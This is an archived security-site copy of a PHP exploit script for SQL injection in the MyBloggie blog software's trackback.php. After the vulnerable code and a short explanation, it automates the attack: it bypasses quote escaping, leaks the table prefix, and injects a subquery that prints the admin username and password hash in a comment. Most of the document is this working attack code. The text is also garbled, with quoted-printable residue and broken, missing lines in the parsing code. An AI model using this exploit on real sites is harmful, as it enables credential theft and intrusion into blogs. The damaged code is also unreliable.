TUCoPS :: Web :: Blogs :: b06-4058.htm

TUCoPS :: Web :: Blogs :: b06-4058.htm
MyBloggie <= 2.1.4 trackback.php SQL injection / admin credentials disclosure
MyBloggie <= 2.1.4 trackback.php SQL injection / admin credentials disclosure MyBloggie <= 2.1.4 trackback.php SQL injection / admin credentials disclosure

#!/usr/bin/php -q -d short_open_tag=on=0D
rgod@autistici.org\n";=0D 
echo "site: http://retrogod.altervista.org\n\n";=0D 
=0D
/*=0D
works regardless of php.ini settings=0D
against MySQL >= 4.1 (allowing subs)=0D
*/=0D
=0D
if ($argc<3) {=0D
echo "Usage: php ".$argv[0]." host path OPTIONS\n";=0D
echo "host:      target server (ip/hostname)\n";=0D
echo "path:      path to MyBloggie\n";=0D
echo "Options:\n";=0D
echo "   -i           specify an existent post id (default: 1)\n";=0D
echo "   -T[prefix]   specify a table prefix different from default (mb_)\n";=0D
echo "   -p[port]:    specify a port other than 80\n";=0D
echo "   -P[ip:port]: specify a proxy\n";=0D
echo "   -d:          disclose table prefix (reccomended)\n";=0D
echo "Example:\r\n";=0D
echo "php ".$argv[0]." localhost /MyBloggie/ -d -i7\r\n";=0D
echo "php ".$argv[0]." localhost /MyBloggie/ -Tm_\r\n";=0D
die;=0D
}=0D
=0D
/* software site: http://mybloggie.mywebland.com/=0D 
=0D
  vulnerable code in trackback.php:=0D
=0D
...=0D
if(!empty($_REQUEST['title'])) {=0D
$title=urldecode(substr($_REQUEST['title'],0,$tb_title_len));=0D
}=0D
else { $tback->trackback_reply(1, "Sorry, Trackback failed.. Reason : No title"); }=0D
=0D
if(!empty($_REQUEST['url'])) {=0D
$url=urldecode($_REQUEST['url']);=0D
=0D
if (validate_url($url)==false) { $tback->trackback_reply(1, "Sorry, Trackback failed.. Reason : URL not valid"); }=0D
}=0D
else { $tback->trackback_reply(1, "Sorry, Trackback failed.. Reason : No URL"); }=0D
=0D
if(!empty($_REQUEST['excerpt']))=0D
 {=0D
  $excerpt=urldecode(substr($_REQUEST['excerpt'],0,$tb_excerpt_len));=0D
 } else {=0D
    $tback->trackback_reply(1, "Sorry, Trackback failed.. Reason : No Excerpt");=0D
 }=0D
=0D
// The blog name=0D
if(!empty($_REQUEST['blog_name']))=0D
 {=0D
    $blog_name=urldecode(substr($_REQUEST['blog_name'],0,$tb_blogname_len));=0D
 } else=0D
 {=0D
    $blog_name="No Blog Name";=0D
 }=0D
=0D
$timestamp = mktime(gmtdate('H', time(), $timezone ),gmtdate('i', time(), $timezone ),=0D
             gmtdate('s', time(), $timezone ), gmtdate('n', time(), $timezone ),=0D
             gmtdate('d', time(), $timezone ), gmtdate('Y', time(), $timezone ));=0D
=0D
$sql = "INSERT INTO ".COMMENT_TBL." SET post_id='$tb_id', comment_subject='$title', comments='$excerpt', com_tstamp='$timestamp' ,=0D
              poster = '$blog_name', home='$url', comment_type='trackback'";=0D
=0D
$result = $db->sql_query($sql) or die("Cannot query the database.
" . mysql_error());=0D
...=0D
=0D
you have sql injection in 'title', 'url', 'excerpt' and 'blog_name' argument=0D
with MySQL >= 4.1 that allows SELECT subqueries for INSERT...=0D
=0D
so you can insert admin username & password hash inside comments and you will see them at screen=0D
also arguments are passed to urldecode(), so you can bypass magic_quotes_gpc=0D
with '%2527' sequence for the single quote char=0D
adn you can disclose table prefix going to:=0D
=0D
http://192.168.1.3/mybloggie/index.php?mode=viewdate=0D 
=0D
you will have an error that disloses a query fragment=0D
=0D
-=0D
=0D
ex., injecting code in 'title' argument, query becomes:=0D
=0D
INSERT INTO mb_comment SET post_id='1', comment_subject='hi',comments=(SELECT CONCAT('')FROM mb_user)/*', comments='whatever', com_tstamp='1154799697' ,=0D
poster = 'whatever', home='http://www.suntzu.org', comment_type='trackback'=0D 
									      */=0D
=0D
error_reporting(0);=0D
ini_set("max_execution_time",0);=0D
ini_set("default_socket_timeout",5);=0D
=0D
function quick_dump($string)=0D
{=0D
  $result='';$exa='';$cont=0;=0D
  for ($i=0; $i<=strlen($string)-1; $i++)=0D
  {=0D
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))=0D
   {$result.="  .";}=0D
   else=0D
   {$result.="  ".$string[$i];}=0D
   if (strlen(dechex(ord($string[$i])))==2)=0D
   {$exa.=" ".dechex(ord($string[$i]));}=0D
   else=0D
   {$exa.=" 0".dechex(ord($string[$i]));}=0D
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}=0D
  }=0D
 return $exa."\r\n".$result;=0D
}=0D
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';=0D
function sendpacketii($packet)=0D
{=0D
  global $proxy, $host, $port, $html, $proxy_regex;=0D
  if ($proxy=='') {=0D
    $ock=fsockopen(gethostbyname($host),$port);=0D
    if (!$ock) {=0D
      echo 'No response from '.$host.':'.$port; die;=0D
    }=0D
  }=0D
  else {=0D
   $c = preg_match($proxy_regex,$proxy);=0D
    if (!$c) {=0D
      echo 'Not a valid proxy...';die;=0D
    }=0D
    $parts=explode(':',$proxy);=0D
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";=0D
    $ock=fsockopen($parts[0],$parts[1]);=0D
    if (!$ock) {=0D
      echo 'No response from proxy...';die;=0D
   }=0D
  }=0D
  fputs($ock,$packet);=0D
  if ($proxy=='') {=0D
    $html='';=0D
    while (!feof($ock)) {=0D
      $html.=fgets($ock);=0D
    }=0D
  }=0D
  else {=0D
    $html='';=0D
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {=0D
      $html.=fread($ock,1);=0D
    }=0D
  }=0D
  fclose($ock);=0D
  #debug=0D
  #echo "\r\n".$html;=0D
}=0D
=0D
function is_hash($hash)=0D
{=0D
 if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}=0D
 else {return false;}=0D
}=0D
=0D
$host=$argv[1];=0D
$path=$argv[2];=0D
$port=80;=0D
$prefix="mb_";=0D
$post_id="1";//admin=0D
$proxy="";=0D
$dt=0;=0D
=0D
for ($i=3; $i<$argc; $i++){=0D
$temp=$argv[$i][0].$argv[$i][1];=0D
if ($temp=="-p")=0D
{=0D
  $port=str_replace("-p","",$argv[$i]);=0D
}=0D
if ($temp=="-P")=0D
{=0D
  $proxy=str_replace("-P","",$argv[$i]);=0D
}=0D
if ($temp=="-T")=0D
{=0D
  $prefix=str_replace("-T","",$argv[$i]);=0D
}=0D
if ($temp=="-i")=0D
{=0D
  $post_id=(int) str_replace("-i","",$argv[$i]);=0D
  echo "post id -> ".$post_id."\n";=0D
}=0D
if ($temp=="-d")=0D
{=0D
  $dt=1;=0D
}=0D
}=0D
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}=0D
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}=0D 
=0D
if ($dt)=0D
{=0D
$packet ="GET ".$p."index.php?mode=viewdate HTTP/1.0\r\n";=0D
$packet.="Host: ".$host."\r\n";=0D
$packet.="Connection: Close\r\n\r\n";=0D
sendpacketii($packet);=0D
if (strstr($html,"You have an error in your SQL syntax"))=0D
{=0D
  $temp=explode("UNIXTIME(",$html);=0D
  $temp2=explode("posts.timest",$temp[1]);=0D
  $prefix=$temp2[0];=0D
  echo "table prefix -> ".$prefix."\n";=0D
}=0D
}=0D
=0D
$sql="%2527,comments=(SELECT CONCAT(%2527%2527)FROM ".$prefix."user)/*";=0D
//some problems with argument length, maybe with prefix > 3 chars you will have some error, cut the '%2527)FROM ".$prefix."user)/*";=0D
$data="title=hi".$sql;=0D
$data.="&url=http%3a%2f%2fwww%2esuntzu%2eorg";=0D
$data.="&excerpt=whatever";=0D
$data.="&blog_name=whatever";=0D
$packet ="POST ".$p."trackback.php/$post_id HTTP/1.0\r\n";=0D
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";=0D
$packet.="Content-Length: ".strlen($data)."\r\n";=0D
$packet.="Host: ".$host."\r\n";=0D
$packet.="Connection: Close\r\n\r\n";=0D
$packet.=$data;=0D
sendpacketii($packet);=0D
sleep(1);=0D
=0D
$packet ="GET ".$p."index.php?mode=viewid&post_id=$post_id HTTP/1.0\r\n";=0D
$packet.="Host: ".$host."\r\n";=0D
$packet.="Connection: Close\r\n\r\n";=0D
sendpacketii($packet);=0D
//echo $html;=0D
$temp=explode('"message">",$temp[$i]);=0D
if (is_hash($temp2[0]))=0D
{=0D
  $hash=$temp2[0];=0D
  $temp2=explode("-->",$temp[$i+1]);=0D
  $admin=$temp2[0];=0D
  echo "----------------------------------------------------------------\n";=0D
  echo "admin          -> ".$admin."\n";=0D
  echo "password (md5) -> ".$hash."\n";=0D
  echo "----------------------------------------------------------------\n";=0D
  die();=0D
}=0D
}=0D
//if you are here...=0D
echo "exploit failed...";=0D
?>=0D
=0D
original url: http://retrogod.altervista.org/mybloggie_214_sql.html=0D